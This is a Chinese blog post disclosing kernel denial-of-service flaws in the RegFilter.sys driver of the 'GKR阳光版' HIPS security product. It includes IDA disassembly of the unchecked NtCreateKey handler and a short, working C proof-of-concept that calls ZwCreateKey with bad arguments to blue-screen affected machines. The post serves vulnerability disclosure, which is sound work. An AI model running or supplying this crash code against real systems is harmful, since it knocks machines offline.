GKR阳光版 RegFilter.sys<=2.0.00 多处内核拒绝服务漏洞
2012-05-29 10:32
495 查看
今天实在是无聊了,看到卡饭有个HIPS 叫GKR阳光版,正在做活动,还比较火,于是下载下来看之。发现有不少的内核拒绝服务漏洞。
受影响的版本号:
驱动:RegFilter.sys
示例函数:NtCreateKey
偏移:5076
测试代码:
ps:
1.一上来就if(xxx ){}的,可以看下老V的文章:http://bbs.pediy.com/showthread.php?t=144611
2.运行测试程序,在装有GKR的机器上马上蓝屏重启。正常机器木有影响。
3.选择安全软件需谨慎,不然还不如不装。。。
受影响的版本号:
驱动:RegFilter.sys
示例函数:NtCreateKey
偏移:5076
IDA汇编代码如下: PAGE:000150A0 mov ebx, [ebp+10h] PAGE:000150A3 cmp ebx, edi ;一上来就来if(xxx){},实在无语 PAGE:000150A5 jz short loc_15112 PAGE:000150A7 mov ecx, [ebx+4] PAGE:000150AA mov [ebp-20h], ecx PAGE:000150AD cmp al, 1 PAGE:000150AF jnz short loc_15100 PAGE:000150B1 push 4 PAGE:000150B3 push 18h PAGE:000150B5 push ebx PAGE:000150B6 mov esi, ds:ProbeForRead PAGE:000150BC call esi ; ProbeForRead PAGE:000150BE mov eax, [ebx+8] PAGE:000150C1 cmp eax, edi PAGE:000150C3 jz short loc_150EC PAGE:000150C5 mov ecx, ds:MmUserProbeAddress PAGE:000150CB mov edx, [ecx] PAGE:000150CD cmp eax, edx
测试代码:
/* 作者:莫灰灰 博客:http://blog.csdn.net/hu3167343 描述:GKR阳光版内核拒绝服务漏洞测试程序 */ #include "stdafx.h" #include <windows.h> int _tmain(int argc, _TCHAR* argv[]) { HMODULE hMod = LoadLibrary(L"ntdll.dll"); if (hMod) { PVOID p = GetProcAddress(hMod, "ZwCreateKey"); if (p) { __asm{ push 0 push 0 push 0 push 0 push 0x80000000 push 0 push 0 call p } } } return 0; }
ps:
1.一上来就if(xxx ){}的,可以看下老V的文章:http://bbs.pediy.com/showthread.php?t=144611
2.运行测试程序,在装有GKR的机器上马上蓝屏重启。正常机器木有影响。
3.选择安全软件需谨慎,不然还不如不装。。。
相关文章推荐
- PowerTool kEvP.sys<=V4.2 内核拒绝服务漏洞
- WindowsXP SP3 AFD.sys 本地拒绝服务漏洞的挖掘过程
- 【推荐】锐捷Su1xDriver.sys 1.0.0.1 内核拒绝服务漏洞
- 瑞星2011、2012神马的各种内核拒绝服务漏洞
- Vista发现内核安全漏洞 可遭到拒绝服务攻击
- 本地拒绝服务漏洞修复建议
- logback logback.xml常用配置详解(三) <filter>
- (三)洞悉linux下的Netfilter&iptables:内核中的rule,match和target
- CVE-2014-7911: Android <5.0 Privilege Escalation using ObjectInputStream (权限提升漏洞)
- BIND DNS拒绝服务漏洞 CVE-2016-2776修复
- TeamSpeak Server多个拒绝服务和绕过安全限制漏洞
- <cf>Sysadmin Bob
- (二)洞悉linux下的Netfilter&iptables:内核中的ip_tables小觑
- <寒江独钓>Windows内核安全编程__键盘过滤之内核级Hook(一)
- <FORM action=reg.asp?action=apply method=post> <INPUT type=submit value="请认真查看<服务条款和声明>(10
- (二)洞悉linux下的Netfilter&iptables:内核中的ip_tables小觑
- Microsoft Windows Vista DHCP远程拒绝服务漏洞(MS08-004)
- <intent-filter>中的属性
- 每天一段linux内核代码——<kernel/sched.c>
- Linux kernel 本地拒绝服务漏洞